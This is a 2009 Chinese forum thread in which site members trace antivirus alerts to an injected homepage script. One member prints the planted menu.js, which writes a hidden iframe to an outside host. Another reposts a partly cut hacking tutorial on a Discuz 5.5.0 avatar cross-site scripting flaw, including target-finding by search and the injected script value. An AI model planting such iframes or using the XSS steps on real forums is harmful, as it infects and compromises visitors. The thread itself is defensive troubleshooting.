slkang 發表於 2009-8-19 14:19:53

小紅傘偵測到本站有病毒

請站長及電電檢查一下

colub2002 發表於 2009-8-19 15:07:18

我的卡巴也偵測木馬程式!!

亞瑪遜戰士 發表於 2009-8-19 15:16:35

真的中獎了


dyeverywhere 發表於 2009-8-19 15:25:31

我的小紅傘也報告了,menu...

Cantabile 發表於 2009-8-19 15:39:15

我的小紅傘也偵測到了

jinwen 發表於 2009-8-19 15:55:25

Nortorn也有叫兩次




west 發表於 2009-8-19 15:59:00

ㄟ害..找不到電電
我也不會搞這種的

有沒有高手可以跳下來幫我一下的?

Pin 發表於 2009-8-19 18:40:43

首頁的html 第一行被加上了這敘述
<script language=javascript src=include/menu.js></script>

病毒就是從 menu.js 來的 !!

menu.js的內容為
document.write("<iframe width='0' height='0' src=' http://w3w3w3.cn/index.htm'></iframe>");

[ 本帖最後由 Pin 於 2009-8-19 18:42 編輯 ]

west 發表於 2009-8-19 18:53:11

menu.js 我從ftp進去刪掉了
如何防止再次發生呢?

Pin 發表於 2009-8-19 18:55:59

留意一下權限(apache , ftp , mysql , php / html )的設置 !!

west 發表於 2009-8-19 19:00:02

首頁的php 我剛抓回來改好了!
感謝Pin!
我會請電電論壇看管緊一點。

west 發表於 2009-8-19 19:09:40

Max 說:
這個一定要問問電電才可以
Max 說:
php 只有他熟
Max 說:
8月份 論壇根目錄下 有四個異動檔案
Max 說:
即然都被更改了 表示程式可能存淺在漏洞
Max 說:
5.5 已經沒什麼安全性更新可作
Max 說:
估計官方也不維護了
( west西楓 ) 說:
我有問他升級 7
( west西楓 ) 說:
他說之前一些設計的頁面..升級之後就會無作用
( west西楓 ) 說:
很麻煩

Pin 發表於 2009-8-19 19:23:19

主機誰在管?
先要網管對照log找出,對方從哪來,進到哪個門!
之後,主人才能把把門關好吧!?

很抱歉,上面的msn對話沒有任何幫助!!
因為根本沒看log就推斷問題怎發生,於事無補!

slkang 發表於 2009-8-19 21:26:05

本文轉貼自網路http://www.bycnboy.com/article.asp?id=426,建議是否要更新版本

漏洞利用 入侵Discuz 5.5.0

最近閑來無事的HACK,掀起了一場Discuz 5.5.0z論壇,入侵狂潮的“運動”。一時間鬧整個安全界也是沸騰不已。不過各站點的站長們身手還算敏捷,Discuz 5.3.0論壇還沒用多久,便換上了高版本的論壇Discuz 5.5.0版本)進行彌補漏洞。但是經過筆者測試成功,得出高級版本的Discuz程式,也是含有跨站入侵的漏洞。只是在方法有些差別而已。
 一、望穿秋水的“手動”入侵法
  1.首先進入GOOGLE或者百度的搜索站點,在關鍵字處輸入Powered by Discuz 5.5.0,然後單擊 “目標”按鈕進入。便可查找出眾多使用此版本的論壇位址,這裏筆者隨意挑選了一個遊戲公司的站點作例題講解。進入遊戲公司站點後,單擊右上角 “註冊”標籤,彈出會員用戶的注意事項,並且需要等待論壇所設置的閱讀時間,然後“單擊”下方同意按鈕,在註冊用戶的必填處,填入自己的相關資訊,最後單擊“提交”按鈕,即可成功註冊。
2.會員註冊成功以後,自動跳轉到論壇首頁。在依次進入“控制面板”→“編輯個人資料”。打開“編輯個人資料”標籤,單擊下方“論壇頭像列表”按鈕,會顯示出論壇頭像中的所有圖片。這裏筆者隨意選擇了一個預設的頭像圖片 ,並將其頁面保存到本地機器中。


3.在轉到本地機器,以記事本形式打開保存的頁面,並單擊上方“編輯”標籤,選擇“查找”選項,彈出查找對話方塊。在查找文本處輸入 “<FORM action=”的字元內容(如果找不到,就直接搜索action=),........................................恕刪
4.提交頭像成功以後,使用DreamWeaver網頁設計軟體將本地提交的頁面打開,然後單擊頭像一的Radio空間,把選定址處改為“images/avatars/02.gif"><script>alert("曲靖提醒:貴站含有頭像跨站漏洞,請採取相關的防禦措施!")</script>”的代碼字元。在單擊“檔”功能表,選擇“保存”選項,即可將修改的控制項,成功保存。然後在雙擊打開該頁面,選擇頭像一的單選框,並單擊下方“提交”按鈕。程式回顯會提示:修改成功!同時刷新此頁面,彈出筆者所建立的警告對話方塊,最後在找個熱門的帖子回復一下,只要當用戶打開含有筆者的帖子時,都會彈出如圖3的警告對話方塊!
........................................恕刪

二、工欲善其事必先利其器
也許繁瑣的手工入侵法,不太適合菜鳥使用。不過沒有關係,筆者又為眾菜鳥們量身定做了,一套“傻瓜式”入侵套餐。此套餐的宗旨就是讓有無基礎的菜鳥朋友,都可以按著下文介紹的方法,來入侵高級版本的Discuz論壇。

........................................恕刪


三、總結
  Discuz 5.3.0版本的頭像跨站漏洞,雖然不會危機到整個論壇的安全性能,但是它會牽扯到論壇所用戶的電腦安危。小則導致重要資訊被竊取,大則電腦搖身變肉雞!
注意:本文所介紹的內容,只是告訴大家這種技術,任何人不得利用此技術做非法的事情





[ 本帖最後由 slkang 於 2009-8-19 21:33 編輯 ]

Pin 發表於 2009-8-19 22:02:19

如果這漏洞真的如上面所敘述,那要抓到這個人是誰就容易多了!

另,把form的提交路徑寫死成絕對網域與路徑。PHP有相關語法可支援!

Pin 發表於 2009-8-20 13:38:38

又中鏢了!!
同樣的問題又發生囉~~ 8/20 13:39

[ 本帖最後由 Pin 於 2009-8-20 13:42 編輯 ]

slkang 發表於 2009-8-20 13:42:12

原帖由 Pin 於 2009-8-20 13:38 發表 http://www.hd.club.tw/images/common/back.gif
又中鏢了!!同樣的問題又發生囉~~ 8/20 13:39

在首頁的源碼第十六行處!!


是阿!!我也又偵測到!!

Pin 發表於 2009-8-20 13:43:36

抱歉...還是第一行中標啦!!
剛才看錯了~~

west 發表於 2009-8-20 13:49:34

剛剛又像昨天一樣的步驟,處理了。
請問有甚麼方式可以杜絕?

更新論壇版本嗎?

Pin 發表於 2009-8-20 13:53:17

老大...方便找人先看看log檔嗎??
不然用"事後補救的態度"來處理正在面臨的資安問題,
會很辛苦的!!防不勝防~~
頁: [1] 2
查看完整版本: 小紅傘偵測到本站有病毒